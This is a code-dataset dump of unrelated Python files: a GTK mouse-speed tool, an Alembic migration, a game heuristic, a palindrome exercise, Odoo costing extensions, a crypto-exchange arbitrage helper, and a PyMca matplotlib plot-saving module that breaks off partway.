True\t\t\t\t\t\n\t\t\telse:\n\t\t\t\tself.cmd = self.cmd[1:]\t\t\t\n \n\tdef startup_clicked\t(self, startup_Button):\n\t\t\tdialog = Gtk.Dialog()\n\t\t\taccel = 
('xset m {}\\n'.format(self.accel_value))\r\n\t\t\tdecel = ('xinput set-prop {} {} {}'.format(self.id, self.prop_id, self.decel_value))\r\n\t\t\t\n\t\t\t\n\tdef about_btn_activate(self, about_button):\r\n\t\tdialog = Gtk.AboutDialog()\r\n\t\tdialog.set_program_name('Velocity')\r\n\t\tdialog.set_version('0.1.0')\r\n\t\tdialog.set_website(\"Youneedtocreateone.com\")\r\n\t\tdialog.set_authors([\"Luther\"])\r\n\t\tdialog.set_license(license)\r\n\t\tdialog.set_logo_icon_name('mouse-512.png')\r\n\t\tdialog.set_default_size(300, 150)\r\n\t\tdialog.show()\r\n\t\t\r\n\t\t\t\r\n \r\nwindow = mouse_config()\r\nwindow.show_all()\r\nwindow.connect(\"delete-event\", Gtk.main_quit)\r\nGtk.main()\r\n","repo_name":"fr3nzy/Mouse-config-","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"22046030181","text":"\"\"\"Adding key-value table\n\nRevision ID: 456fd4e10658\nRevises: 4475ef3e98af\nCreate Date: 2015-11-05 01:47:04.347535\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '456fd4e10658'\ndown_revision = '4475ef3e98af'\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy import Column, String, Text\n \n\n\ndef upgrade():\n op.create_table('storage',\n Column('key', String(255), primary_key=True),\n Column('value', Text),\n )\n\n\ndef downgrade():\n op.drop_table('storage')\n","repo_name":"adsabs/ADSOrcid","sub_path":"alembic/versions/456fd4e10658_adding_key_value_table.py","file_name":"456fd4e10658_adding_key_value_table.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"46440763246","text":"def omar_wid170709_heuristic(game, player):\n\n if game.is_loser(player):\n return float(\"-inf\")\n\n if game.is_winner(player):\n return float(\"inf\")\n\n my_moves = len(game.get_legal_moves(player))\n opponent_moves = len(game.get_legal_moves(game.get_opponent(player)))\n\n weight = 0.0\n\n x, y = game.get_player_location(player)\n\n if (x < game.width-1) and (x > 0) and (y < game.height -1) and (y > 0):\n weight = 0.2\n\n diference_moves = my_moves - opponent_moves\n\n return diference_moves * (1.0 + weight)","repo_name":"omarTronto/WID3009_AIGaming_Group-5_MiniProjectAndAssignments","sub_path":"Individual Assignments/Omar Abdelmomen_WID170709_17107261/Assignment 2/omar_wid170709.py","file_name":"omar_wid170709.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"20497991761","text":"def inverse_chaine(chaine):\n resultat = ''\n for caractere in chaine:\n resultat = caractere + resultat\n return resultat\n\ndef est_palindrome(chaine):\n inverse = inverse_chaine(chaine)\n return chaine == inverse\n\ndef est_nbr_palindrome(nombre):\n chaine = str(nombre)\n return est_palindrome(chaine)\n\n\n# tests\n\nassert inverse_chaine('bac') == 'cab'\n\nassert not est_palindrome('NSI')\n\nassert est_palindrome('ISN-NSI')\n\nassert not est_nbr_palindrome(214312)\n\nassert est_nbr_palindrome(213312)\n","repo_name":"mickaelSASL/epreuve-pratique","sub_path":"2-moyen/est_nb_palindrome/exo.py","file_name":"exo.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6622837168","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import UserError\n\nclass ICTSaleDeliveryModel(models.Model):\n 
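# Design note (sketch): _inherit without a new _name extends the existing 'stock.picking'\n # model in place, so the fields declared below are added to every transfer/delivery record.\n 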
_inherit = 'stock.picking'\n\n ict_sales_costing_date = fields.Date('Costing Date')\n sapps_is_real_time = fields.Boolean(string=\"Is Real Time\", compute=\"_compute_is_real_time\")\n\n def _compute_is_real_time(self):\n for res in self:\n res.sapps_is_real_time = bool(self.env['ir.config_parameter'].sudo().get_param('ict_overhead_expenses.sapps_is_real_time'))\n\n def action_done(self):\n res = super(ICTSaleDeliveryModel, self).action_done()\n self._compute_is_real_time()\n if self.sapps_is_real_time and self.sale_id:\n # check period is opened\n last_opened_period = self.env['ict_overhead_expenses.period'].search(\n [('state', '=', 'open')], order='date_start desc', limit=1)\n if last_opened_period and last_opened_period.date_stop < fields.date.today():\n raise UserError(_(\n 'You Cannot proceed with posting inventory, the last opened period is %s' % last_opened_period.name))\n self.ict_sales_costing_date = fields.date.today()\n return res\n\n\nclass ICTLoadingCostStockMove(models.Model):\n _inherit = 'stock.move'\n\n ict_proc_id = fields.Many2one(comodel_name='ict_overhead_expenses.procedure.log', string='Loading Cost Operation', store=True)\n\n def _prepare_account_move_vals(self, credit_account_id, debit_account_id, journal_id, qty, description, svl_id, cost):\n self.ensure_one()\n if self.state == 'done' and self.product_id.bom_ids and \\\n len(self.move_line_ids.filtered(lambda v: v.cost_date)) > 0 and \\\n len(self.product_id.bom_ids.filtered(lambda i: i.finishing_product_ok)) > 0:\n group_by_costing_date = []\n for item in self.move_line_ids.filtered(lambda v: v.cost_date):\n try:\n element = next(i for i in group_by_costing_date if i[\"costing_date\"] == item.cost_date)\n element['count'] = element['count'] + 1\n except StopIteration:\n group_by_costing_date.append({'costing_date': item.cost_date, 'count':1})\n\n total = sum (i['count'] for i in group_by_costing_date)\n # group_by_costing_date[item.cost_date] = group_by_costing_date[item.cost_date] + 1 if group_by_costing_date[item.cost_date] else 1\n for elem in group_by_costing_date:\n AccountMove = self.env['account.move'].with_context(default_journal_id=journal_id)\n\n move_lines = self._prepare_account_move_line(elem['count'], cost*elem['count']/total, credit_account_id, debit_account_id, description)\n if move_lines:\n date = self._context.get('force_period_date', fields.Date.context_today(self))\n new_account_move = AccountMove.sudo().create({\n 'journal_id': journal_id,\n 'line_ids': move_lines,\n 'date': elem['costing_date'],\n 'ref': description,\n 'stock_move_id': self.id,\n 'stock_valuation_layer_ids': [(6, None, [svl_id])],\n 'move_type': 'entry',\n })\n new_account_move.post()\n else:\n return super(ICTLoadingCostStockMove, self)._prepare_account_move_vals(credit_account_id, debit_account_id, journal_id, qty, description, svl_id, cost)\n\n\nclass ICTLoadingCostMrpProduction(models.Model):\n _inherit = 'mrp.production'\n\n unallocated_mo_count = fields.Integer('Unallocated MO Count', compute='_compute_unallocated_move_count', search='_search_unallocated_mo')\n\n def _search_unallocated_mo(self, operator, value):\n recs = self.search([])\n result = []\n if recs:\n for r in recs:\n if r.bom_id.finishing_product_ok and len(r.finished_move_line_ids.filtered(lambda a: a.cost_date is False)) > 0:\n result.append(r.id)\n return [('id', 'in', result)]\n\n @api.depends('name')\n def _compute_unallocated_move_count(self):\n for res in self:\n if res.state == 'done':\n res.unallocated_mo_count = 
len(res.finished_move_line_ids.filtered(lambda item: False if item.cost_date else True))\n else:\n res.unallocated_mo_count = 0\n\n\nclass ICTOverheadStockMoveLine(models.Model):\n _inherit = \"stock.move.line\"\n\n cost_date = fields.Date('Costing Date')\n ict_included_in_product_cost = fields.Boolean('Overhead Processed', default=False)\n ict_period_id = fields.Many2one(comodel_name='ict_overhead_expenses.sold.items', string='period')\n ict_is_processed_line = fields.Boolean('Is Processed', default=False)\n\n @api.constrains('cost_date')\n def check_cost_date(self):\n if self.cost_date:\n if self.ict_is_processed_line:\n raise UserError(_('You cannot modify a processed line'))\n last_run = self.env['ict_overhead_expenses.procedure.log'].sudo().search([('state', '=', 'done')], order='id desc',\n limit=1)\n if last_run and last_run.end_date >= self.cost_date:\n raise UserError(_('You cannot assign a costing date of closed period'))","repo_name":"OdooAdminstrator1/development","sub_path":"ict_overhead_expenses/models/stock_move.py","file_name":"stock_move.py","file_ext":"py","file_size_in_byte":5462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"43722838349","text":"import btceAPI, poloniexAPI, krakenAPI, gdaxAPI\r\nfrom krakenAPI import krak\r\nimport urllib.request\r\nimport json\r\nfrom threading import Thread\r\nfrom time import sleep\r\nfrom datetime import datetime\r\nimport os\r\nimport socket\r\nfrom threading import Thread\r\nimport requests\r\n\r\n\r\nclass Exchange:\r\n \r\n # After selling or buying info about the trade\r\n deal_details = {}\r\n \r\n # Info about the last trade before the current\r\n deal_details_old = {}\r\n \r\n # Info about a canceled order\r\n cancel_details = {}\r\n \r\n # Trade fee\r\n fee = 0\r\n \r\n # API Request string for an exchange\r\n urldata = ''\r\n \r\n # Initial and current amount of ethereum and bitcoin on the exchange\r\n start_eth, eth = 0, 0\r\n start_btc, btc = 0, 0\r\n \r\n # Amount of ethereum, bitcoin on an exchange after the deal adjusted to take into account the order book values\r\n adj_eth = 0\r\n adj_btc = 0\r\n \r\n # Price and amount of crypto when bought/sold\r\n buy_price = 0\r\n sell_price = 0\r\n buy_amount = 0\r\n sell_amount = 0\r\n \r\n # Required minimum profit to make the deal profitable\r\n min_profit = 0\r\n\r\n # Assigning some number to order_ID\r\n order_id = 777777\r\n\r\n\r\n def __init__(self, ex_name):\r\n self.__name = ex_name\r\n self.name = ex_name\r\n\r\n def sell(self):\r\n pass\r\n\r\n def buy(self):\r\n pass\r\n\r\n # Refreshing buy/sell price for various exchanges by loading order book information\r\n\r\n def refresh_price_polo(self):\r\n urldata = 'https://poloniex.com/public?command=returnOrderBook¤cyPair=BTC_ETH&depth=30'\r\n s = requests.Session()\r\n try:\r\n r = s.get(urldata, timeout=5)\r\n text = r.text\r\n the_json = json.loads(text)\r\n self.buy_price = float(the_json['asks'][0][0])\r\n self.buy_amount = float(the_json['asks'][0][1])\r\n self.sell_price = float(the_json['bids'][0][0])\r\n self.sell_amount = float(the_json['bids'][0][1])\r\n finally:\r\n s.close()\r\n\r\n def refresh_price_btce(self):\r\n urldata = 'https://btc-e.com/api/3/depth/eth_btc'\r\n s = requests.Session()\r\n try:\r\n r = s.get(urldata, timeout=5)\r\n text = r.text\r\n the_json = json.loads(text)\r\n self.sell_price = float(the_json['eth_btc']['bids'][0][0])\r\n self.sell_amount = float(the_json['eth_btc']['bids'][0][1])\r\n self.buy_price = 
float(the_json['eth_btc']['asks'][0][0])\r\n self.buy_amount = float(the_json['eth_btc']['asks'][0][1])\r\n finally:\r\n s.close()\r\n\r\n def refresh_price_kraken(self):\r\n the_json = krakenAPI.krak.query_public('Depth', {'pair': 'XETHXXBT', 'count': 5})\r\n self.buy_price = float(the_json['result']['XETHXXBT']['asks'][0][0])\r\n self.buy_amount = float(the_json['result']['XETHXXBT']['asks'][0][1])\r\n self.sell_price = float(the_json['result']['XETHXXBT']['bids'][0][0])\r\n self.sell_amount = float(the_json['result']['XETHXXBT']['bids'][0][1])\r\n\r\n def refresh_price_gdax(self):\r\n urldata = 'https://api.gdax.com/products/ETH-BTC/book?level=1'\r\n s = requests.Session()\r\n try:\r\n r = s.get(urldata, timeout=5)\r\n text = r.text\r\n the_json = json.loads(text)\r\n self.sell_price = float(the_json['bids'][0][0])\r\n self.sell_amount = float(the_json['bids'][0][1])\r\n self.buy_price = float(the_json['asks'][0][0])\r\n self.buy_amount = float(the_json['asks'][0][1])\r\n finally:\r\n s.close()\r\n\r\n # Buy/sell methods for various exchanges\r\n\r\n def sell_polo(self, rate, amount):\r\n return poloniexAPI.polo.sell('BTC_ETH', rate, amount)\r\n\r\n def buy_polo(self, rate, amount):\r\n return poloniexAPI.polo.buy('BTC_ETH', rate, amount)\r\n\r\n def sell_btce(self, rate, amount):\r\n p = str(rate)\r\n rate = float(p[0:7])\r\n p = str(amount)\r\n amount = float(p[0:7])\r\n return btceAPI.btce.Trade('eth_btc', 'sell', rate, amount)\r\n\r\n def buy_btce(self, rate, amount):\r\n p = str(rate)\r\n rate = float(p[0:7])\r\n p = str(amount)\r\n amount = float(p[0:7])\r\n return btceAPI.btce.Trade('eth_btc', 'buy', rate, amount)\r\n\r\n def sell_kraken(self, rate, amount):\r\n return krakenAPI.krak.PlaceOrder('XETHXXBT', 'sell', rate, amount)\r\n\r\n def buy_kraken(self, rate, amount):\r\n return krakenAPI.krak.PlaceOrder('XETHXXBT', 'buy', rate, amount)\r\n\r\n def sell_gdax(self, rate, amount):\r\n p = str(rate)\r\n rate = float(p[0:7])\r\n p = str(amount)\r\n amount = float(p[0:8])\r\n return gdaxAPI.gdax.sell(rate, amount)\r\n\r\n def buy_gdax(self, rate, amount):\r\n p = str(rate)\r\n rate = float(p[0:7])\r\n p = str(amount)\r\n amount = float(p[0:8])\r\n return gdaxAPI.gdax.buy(rate, amount)\r\n \r\n # Refreshing balances for various exchanges\r\n\r\n def refresh_balances_btce(self):\r\n balance = btceAPI.btce.getInfo()\r\n self.eth = round(float(balance['return']['funds']['eth']) - 0.00001, 5)\r\n self.btc = round(float(balance['return']['funds']['btc']) - 0.00001, 5)\r\n\r\n def refresh_balances_polo(self):\r\n balance = poloniexAPI.polo.return_balances()\r\n self.eth = round(float(balance['ETH']) - 0.00001, 5)\r\n self.btc = round(float(balance['BTC']) - 0.00001, 5)\r\n\r\n def refresh_balances_kraken(self):\r\n balance = krakenAPI.krak.query_private('Balance')\r\n self.eth = float(balance['result']['XETH']) - 0.00001\r\n self.btc = float(balance['result']['XXBT']) - 0.00001\r\n\r\n dict = krakenAPI.krak.query_private('open_orders')\r\n\r\n adj_btc = 0\r\n adj_eth = 0\r\n dict = dict['result']['open']\r\n for key in dict:\r\n if dict[key]['descr']['type'] == 'buy':\r\n adj_btc = adj_btc + float(dict[key]['vol']) * float(dict[key]['descr']['price'])\r\n if dict[key]['descr']['type'] == 'sell':\r\n adj_eth = adj_eth + float(dict[key]['vol'])\r\n\r\n self.eth = self.eth - adj_eth\r\n self.btc = self.btc - adj_btc\r\n\r\n def refresh_balances_gdax(self):\r\n balance = gdaxAPI.gdax.get_accounts()\r\n for account in balance:\r\n if account['currency'] == 'BTC':\r\n self.btc = 
round(float(account['available']) - 0.00001, 5)\r\n if account['currency'] == 'ETH':\r\n self.eth = round(float(account['available']) - 0.00001, 5)\r\n \r\n # Method to check if the deal was successful for various exchanges \r\n\r\n def succesful_deal_btce(self, deal_details):\r\n if 'return' in deal_details:\r\n self.order_id = deal_details['return']['order_id']\r\n if 'success' in deal_details:\r\n if deal_details['success'] != 0:\r\n return True\r\n return False\r\n\r\n def succesful_deal_poloniex(self, deal_details):\r\n if 'orderNumber' in deal_details:\r\n self.order_id = deal_details['orderNumber']\r\n if 'error' not in deal_details:\r\n return True\r\n return False\r\n\r\n\r\n def succesful_deal_gdax(self, deal_details):\r\n if 'id' in deal_details:\r\n self.order_id = deal_details['id']\r\n return True\r\n return False\r\n \r\n # Example:\r\n # {'result': {'descr': {'order': 'buy 0.10000000 ETHXBT @ limit 0.010000'}, 'txid': ['OHBEGS-YHFZZ-O5W2JS']}, 'error': []}\r\n\r\n def succesful_deal_kraken(self, deal_details):\r\n if 'result' in deal_details:\r\n if 'txid' in deal_details['result']:\r\n self.order_id = deal_details['result']['txid'][0]\r\n if deal_details['error'] == []:\r\n return True\r\n return False\r\n\r\n def completed_deal_poloniex(self, deal_details):\r\n if 'resultingTrades' in deal_details:\r\n if deal_details['resultingTrades'] == []:\r\n return False\r\n else:\r\n return True\r\n\r\n def completed_deal_btce(self, deal_details):\r\n if 'return' in deal_details:\r\n if 'order_id' in deal_details['return']:\r\n if deal_details['return']['order_id'] == 0:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\n def completed_deal_kraken(self, deal_details):\r\n return True\r\n\r\n def completed_deal_gdax(self, deal_details):\r\n return True\r\n\r\n def open_orders_poloniex(self):\r\n self.hanging_orders = poloniexAPI.polo.returnopen_orders('BTC_ETH')\r\n\r\n def open_orders_btce(self):\r\n self.hanging_orders = btceAPI.btce.active_orders('eth_btc')\r\n\r\n def open_orders_kraken(self):\r\n self.hanging_orders = krakenAPI.krak.get_open_orders()\r\n\r\n def open_orders_gdax(self):\r\n self.hanging_orders = gdaxAPI.gdax.get_orders()\r\n\r\n def cancel_order_poloniex(self, order_id):\r\n self.cancel_details = poloniexAPI.polo.cancel('BTC_ETH', order_id)\r\n\r\n def cancel_order_btce(self, order_id):\r\n self.cancel_details = btceAPI.btce.cancel_order(order_id)\r\n\r\n def cancel_order_kraken(self, order_id):\r\n self.cancel_details = krakenAPI.krak.cancel_order(order_id)\r\n\r\n def cancel_order_gdax(self, order_id):\r\n self.cancel_details = gdaxAPI.gdax.cancel_order(order_id)\r\n\r\n\r\n# Initializing each exchange as an object\r\nPoloniex = Exchange('POLONIEX')\r\nBtce = Exchange('BTC-E')\r\nKraken = Exchange('KRAKEN')\r\nGdax = Exchange('GDAX')\r\n\r\nPoloniex.hanging_orders = []\r\nBtce.hanging_orders = []\r\nKraken.hanging_orders = []\r\nGdax.hanging_orders = []\r\n\r\n# Redefining names for all methods to unify call methods\r\nPoloniex.refresh_balances = Poloniex.refresh_balances_polo\r\nBtce.refresh_balances = Btce.refresh_balances_btce\r\nKraken.refresh_balances = Kraken.refresh_balances_kraken\r\nGdax.refresh_balances = Gdax.refresh_balances_gdax\r\n\r\nPoloniex.refresh_price = Poloniex.refresh_price_polo\r\nBtce.refresh_price = Btce.refresh_price_btce\r\nKraken.refresh_price = Kraken.refresh_price_kraken\r\nGdax.refresh_price = Gdax.refresh_price_gdax\r\n\r\nPoloniex.buy_function = Poloniex.buy_polo\r\nPoloniex.sell_function = 
Poloniex.sell_polo\r\nBtce.buy_function = Btce.buy_btce\r\nBtce.sell_function = Btce.sell_btce\r\nKraken.buy_function = Kraken.buy_kraken\r\nKraken.sell_function = Kraken.sell_kraken\r\nGdax.buy_function = Gdax.buy_gdax\r\nGdax.sell_function = Gdax.sell_gdax\r\n\r\n\r\nPoloniex.completed_deal = Poloniex.completed_deal_poloniex\r\nBtce.completed_deal = Btce.completed_deal_btce\r\nKraken.completed_deal = Kraken.completed_deal_kraken\r\nGdax.completed_deal = Gdax.completed_deal_gdax\r\n\r\n\r\nPoloniex.succesful_deal = Poloniex.succesful_deal_poloniex\r\nBtce.succesful_deal = Btce.succesful_deal_btce\r\nKraken.succesful_deal = Kraken.succesful_deal_kraken\r\nGdax.succesful_deal = Gdax.succesful_deal_gdax\r\n\r\nPoloniex.open_orders = Poloniex.open_orders_poloniex\r\nBtce.open_orders = Btce.open_orders_btce\r\nKraken.open_orders = Kraken.open_orders_kraken\r\nGdax.open_orders = Gdax.open_orders_gdax\r\n\r\nPoloniex.cancel_order = Poloniex.cancel_order_poloniex\r\nBtce.cancel_order = Btce.cancel_order_btce\r\nKraken.cancel_order = Kraken.cancel_order_kraken\r\nGdax.cancel_order = Gdax.cancel_order_gdax\r\n\r\n# Maker fee on the exchanges\r\nPoloniex.fee = 0.0025\r\nBtce.fee = 0.002\r\nKraken.fee = 0.0026\r\nGdax.fee = 0.003\r\n\r\n# Modifier to account for rounding balances by exchanges\r\nPoloniex.add = 0.000002\r\nBtce.add = 0\r\nKraken.add = 0.000002\r\nGdax.add = 0\r\n\r\nexchange_list = [Poloniex, Btce, Gdax, Kraken]\r\n\r\ndef get_all_hanging_orders():\r\n for exchange in exchange_list:\r\n exchange.open_orders()\r\n\r\ntuple_list = []\r\n\r\ndef make_pairs(exchange_list):\r\n global tuple_list\r\n i = 0\r\n b = 0\r\n # Finding all possible combos of exchanges to arbitrage and saving in a list of tuples\r\n while i < len(exchange_list)-1:\r\n while b < len(exchange_list)-1:\r\n k = [exchange_list[i], exchange_list[b+1]]\r\n t = [exchange_list[b+1], exchange_list[i]]\r\n if k in tuple_list or t in tuple_list:\r\n pass\r\n else:\r\n if exchange_list[i] == exchange_list[b+1]:\r\n pass\r\n else:\r\n tuple_list.append(k)\r\n tuple_list.append(t)\r\n b += 1\r\n b = 0\r\n i += 1\r\n return tuple_list\r\n\r\ntuple_list = make_pairs(exchange_list)\r\n","repo_name":"alexstuk/arbitrage-bot","sub_path":"classExchange.py","file_name":"classExchange.py","file_ext":"py","file_size_in_byte":12479,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"18047186561","text":"__author__ = \"V.A. 
Sole - ESRF Data Analysis\"\n__contact__ = \"sole@esrf.fr\"\n__license__ = \"MIT\"\n__copyright__ = \"European Synchrotron Radiation Facility, Grenoble, France\"\nimport os\nimport numpy\nimport logging\nfrom matplotlib import cm\nfrom matplotlib import __version__ as matplotlib_version\nfrom matplotlib.font_manager import FontProperties\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\nfrom matplotlib.figure import Figure\nfrom matplotlib.colors import LinearSegmentedColormap, LogNorm, Normalize\nfrom matplotlib.ticker import MaxNLocator, AutoLocator\n\n\n_logger = logging.getLogger(__name__)\n\ncolordict = {}\ncolordict['blue'] = '#0000ff'\ncolordict['red'] = '#ff0000'\ncolordict['green'] = '#00ff00'\ncolordict['black'] = '#000000'\ncolordict['white'] = '#ffffff'\ncolordict['pink'] = '#ff66ff'\ncolordict['brown'] = '#a52a2a'\ncolordict['orange'] = '#ff9900'\ncolordict['violet'] = '#6600ff'\ncolordict['grey'] = '#808080'\ncolordict['yellow'] = '#ffff00'\ncolordict['darkgreen'] = 'g'\ncolordict['darkbrown'] = '#660000'\ncolordict['magenta'] = 'm'\ncolordict['cyan'] = 'c'\ncolordict['bluegreen'] = '#33ffff'\ncolorlist = [colordict['black'],\n colordict['red'],\n colordict['blue'],\n colordict['green'],\n colordict['pink'],\n colordict['brown'],\n colordict['cyan'],\n colordict['orange'],\n colordict['violet'],\n colordict['bluegreen'],\n colordict['grey'],\n colordict['magenta'],\n colordict['darkgreen'],\n colordict['darkbrown'],\n colordict['yellow']]\n\nclass PyMcaMatplotlibSave(FigureCanvas):\n def __init__(self, size = (7,3.5),\n logx = False,\n logy = False,\n legends = True,\n bw = False):\n\n self.fig = Figure(figsize=size) #in inches\n FigureCanvas.__init__(self, self.fig)\n\n self._logX = logx\n self._logY = logy\n self._bw = bw\n self._legend = legends\n self._legendList = []\n self._dataCounter = 0\n\n if not legends:\n if self._logY:\n ax = self.fig.add_axes([.15, .15, .75, .8])\n else:\n ax = self.fig.add_axes([.15, .15, .75, .75])\n else:\n if self._logY:\n ax = self.fig.add_axes([.15, .15, .7, .8])\n else:\n ax = self.fig.add_axes([.15, .15, .7, .8])\n\n ax.set_axisbelow(True)\n\n self.ax = ax\n\n\n if self._logY:\n self._axFunction = ax.semilogy\n else:\n self._axFunction = ax.plot\n\n if self._bw:\n self.colorList = ['k'] #only black\n self.styleList = ['-', ':', '-.', '--']\n self.nColors = 1\n else:\n self.colorList = colorlist\n self.styleList = ['-', '-.', ':']\n self.nColors = len(colorlist)\n self.nStyles = len(self.styleList)\n\n self.colorIndex = 0\n self.styleIndex = 0\n\n self.xmin = None\n self.xmax = None\n self.ymin = None\n self.ymax = None\n self.limitsSet = False\n\n def setLimits(self, xmin, xmax, ymin, ymax):\n self.xmin = xmin\n self.xmax = xmax\n self.ymin = ymin\n self.ymax = ymax\n self.limitsSet = True\n\n\n def _filterData(self, x, y):\n index = numpy.flatnonzero((self.xmin <= x) & (x <= self.xmax))\n x = numpy.take(x, index)\n y = numpy.take(y, index)\n index = len(index)\n if index:\n index = numpy.flatnonzero((self.ymin <= y) & (y <= self.ymax))\n index = len(index)\n return index\n\n def _getColorAndStyle(self):\n color = self.colorList[self.colorIndex]\n style = self.styleList[self.styleIndex]\n self.colorIndex += 1\n if self.colorIndex >= self.nColors:\n self.colorIndex = 0\n self.styleIndex += 1\n if self.styleIndex >= self.nStyles:\n self.styleIndex = 0\n return color, style\n\n def addDataToPlot(self, x, y, legend = None,\n color = None,\n linewidth = None,\n linestyle = None, **kw):\n n = max(x.shape)\n if 
self.limitsSet is not None:\n n = self._filterData(x, y)\n if n == 0:\n #nothing to plot\n _logger.debug(\"nothing to plot\")\n return\n style = None\n if color is None:\n color, style = self._getColorAndStyle()\n if linestyle is None:\n if style is None:\n style = '-'\n else:\n style = linestyle\n\n if linewidth is None:linewidth = 1.0\n self._axFunction( x, y, linestyle = style, color=color, linewidth = linewidth, **kw)\n self._dataCounter += 1\n if legend is None:\n #legend = \"%02d\" % self._dataCounter #01, 02, 03, ...\n legend = \"%c\" % (96+self._dataCounter) #a, b, c, ..\n self._legendList.append(legend)\n\n def setXLabel(self, label):\n self.ax.set_xlabel(label)\n\n def setYLabel(self, label):\n self.ax.set_ylabel(label)\n\n def setTitle(self, title):\n self.ax.set_title(title)\n\n def plotLegends(self):\n if not self._legend:return\n if not len(self._legendList):return\n loc = (1.01, 0.0)\n labelsep = 0.015\n drawframe = True\n fontproperties = FontProperties(size=10)\n if len(self._legendList) > 14:\n drawframe = False\n if matplotlib_version < '0.99.0':\n fontproperties = FontProperties(size=8)\n loc = (1.05, -0.2)\n else:\n if len(self._legendList) < 18:\n #drawframe = True\n loc = (1.01, 0.0)\n elif len(self._legendList) < 25:\n loc = (1.05, 0.0)\n fontproperties = FontProperties(size=8)\n elif len(self._legendList) < 28:\n loc = (1.05, 0.0)\n fontproperties = FontProperties(size=6)\n else:\n loc = (1.05, -0.1)\n fontproperties = FontProperties(size=6)\n\n if matplotlib_version < '0.99.0':\n legend = self.ax.legend(self._legendList,\n loc = loc,\n prop = fontproperties,\n labelsep = labelsep,\n pad = 0.15)\n else:\n legend = self.ax.legend(self._legendList,\n loc = loc,\n prop = fontproperties,\n labelspacing = labelsep,\n borderpad = 0.15)\n legend.draw_frame(drawframe)\n\n\n def saveFile(self, filename, format=None):\n if format is None:\n format = filename[-3:]\n\n if format.upper() not in ['EPS', 'PNG', 'SVG']:\n raise ValueError(\"Unknown format %s\" % format)\n\n if os.path.exists(filename):\n os.remove(filename)\n\n if self.limitsSet:\n self.ax.set_ylim(self.ymin, self.ymax)\n self.ax.set_xlim(self.xmin, self.xmax)\n #self.plotLegends()\n self.print_figure(filename)\n return\n\nclass PyMcaMatplotlibSaveImage:\n def __init__(self, imageData=None, fileName=None,\n dpi=300,\n size=(5, 5),\n xaxis='off',\n yaxis='off',\n xlabel='',\n ylabel='',\n nxlabels=0,\n nylabels=0,\n colorbar=None,\n title='',\n interpolation='nearest',\n colormap=None,\n linlogcolormap='linear',\n origin='lower',\n contour='off',\n contourlabels='on',\n contourlabelformat='%.3f',\n contourlevels=10,\n contourlinewidth=10,\n xorigin=0.0,\n yorigin=0.0,\n xpixelsize=1.0,\n ypixelsize=1.0,\n xlimits=None,\n ylimits=None,\n vlimits=None,\n extent=None):\n\n self.figure = Figure(figsize=size) #in inches\n self.canvas = FigureCanvas(self.figure)\n self.imageData = imageData\n self.pixmapImage = None\n self.config={'xaxis':xaxis,\n 'yaxis':yaxis,\n 'title':title,\n 'xlabel':xlabel,\n 'ylabel':ylabel,\n 'nxlabels':nxlabels,\n 'nylabels':nylabels,\n 'colorbar':colorbar,\n 'colormap':colormap,\n 'linlogcolormap':linlogcolormap,\n 'interpolation':interpolation,\n 'origin':origin,\n 'contour':contour,\n 'contourlabels':contourlabels,\n 'contourlabelformat':contourlabelformat,\n 'contourlevels':contourlevels,\n 'contourlinewidth':contourlinewidth,\n 'xpixelsize':xpixelsize,\n 'ypixelsize':ypixelsize,\n 'xorigin':xorigin,\n 'yorigin':yorigin,\n 'zoomxmin':None,\n 'zoomxmax':None,\n 'zoomymin':None,\n 
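# A note on the guard at the top of addDataToPlot above: self.limitsSet is
# initialised to False and only set to True by setLimits(), so the test
# `if self.limitsSet is not None:` is always true and _filterData runs even
# when no limits were set (with xmin/xmax still None the comparisons fail).
# The intended guard is presumably the plain truth test -- a sketch, keeping
# the rest of the method unchanged:
#
#     if self.limitsSet:
#         n = self._filterData(x, y)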
'zoomymax':None,\n 'valuemin':None,\n 'valuemax':None,\n 'xlimits':xlimits,\n 'ylimits':ylimits,\n 'vlimits':vlimits,\n 'extent':extent}\n\n #generate own colormaps\n cdict = {'red': ((0.0, 0.0, 0.0),\n (1.0, 1.0, 1.0)),\n 'green': ((0.0, 0.0, 0.0),\n (1.0, 0.0, 0.0)),\n 'blue': ((0.0, 0.0, 0.0),\n (1.0, 0.0, 0.0))}\n self.__redCmap = LinearSegmentedColormap('red',cdict,256)\n\n cdict = {'red': ((0.0, 0.0, 0.0),\n (1.0, 0.0, 0.0)),\n 'green': ((0.0, 0.0, 0.0),\n (1.0, 1.0, 1.0)),\n 'blue': ((0.0, 0.0, 0.0),\n (1.0, 0.0, 0.0))}\n self.__greenCmap = LinearSegmentedColormap('green',cdict,256)\n\n cdict = {'red': ((0.0, 0.0, 0.0),\n (1.0, 0.0, 0.0)),\n 'green': ((0.0, 0.0, 0.0),\n (1.0, 0.0, 0.0)),\n 'blue': ((0.0, 0.0, 0.0),\n (1.0, 1.0, 1.0))}\n self.__blueCmap = LinearSegmentedColormap('blue',cdict,256)\n\n # Temperature as defined in spslut\n cdict = {'red': ((0.0, 0.0, 0.0),\n (0.5, 0.0, 0.0),\n (0.75, 1.0, 1.0),\n (1.0, 1.0, 1.0)),\n 'green': ((0.0, 0.0, 0.0),\n (0.25, 1.0, 1.0),\n (0.75, 1.0, 1.0),\n (1.0, 0.0, 0.0)),\n 'blue': ((0.0, 1.0, 1.0),\n (0.25, 1.0, 1.0),\n (0.5, 0.0, 0.0),\n (1.0, 0.0, 0.0))}\n\n #Do I really need as many colors?\n self.__temperatureCmap = LinearSegmentedColormap('temperature',\n cdict, 65536)\n\n #reversed gray\n cdict = {'red': ((0.0, 1.0, 1.0),\n (1.0, 